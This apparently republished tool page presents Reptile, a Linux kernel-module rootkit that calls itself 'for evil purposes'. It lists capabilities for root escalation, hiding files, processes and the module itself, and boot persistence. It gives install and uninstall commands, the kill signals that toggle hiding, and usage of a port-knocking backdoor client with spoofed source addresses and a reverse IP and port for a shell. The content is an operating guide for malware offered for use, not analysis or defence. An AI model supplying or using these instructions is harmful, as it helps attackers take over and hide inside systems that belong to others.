Pentest Tools

Published on December 14th, 2017 📆 | 2082 Views ⚑

0

Reptile: LKM Linux rootkit

iSpeech.org
Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes.

Features

• Give root to unprivileged users
• Hide files and directories
• Hide files contents
• Hide processes
• Hide himself
• Boot persistence
• Heaven’s door – A ICMP/UDP/TCP port-knocking backdoor
• Client to knock on heaven’s door ????

Install

apt-get install linux-headers-$(uname -r)
https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install

Uninstall

kill -50 0
rmmod reptile_mod
./install.sh uninstall

Usage

Binaries will be copied to /reptile folder, that will be hidden by Reptile.

Getting root privileges

Hiding

• Hide/unhide reptile module: kill -50 0
• Hide/unhide process: kill -49 <PID>
• Hide files contents: all content between the tags will be hidden

Example:

#<reptile>
content to hide
#</reptile>

Knocking on heaven’s door

Heaven’s door is an ICMP/UDP/TCP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:

Knock Knock on Heaven's Door
Writen by: F0rb1dd3n
[adsense size='1' ]
Usage: ./knock_on_heaven <args>

-x      protocol (ICMP/UDP/TCP)
-s      Source IP address (You can spoof)
-t      Target IP address
-p      Source Port
-q      Target Port
-d      Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l      Launch listener

[!] ICMP doesn't need ports

ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP:  ./knock_on_heaven -x udp  -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l
TCP:  ./knock_on_heaven -x tcp  -s 192.168.0.2 -t 192.168.0.3 -p 666 -q 80 -d "F0rb1dd3n 192.168.0.4 4444" -l

Source: https://github.com/f0rb1dd3n/Reptile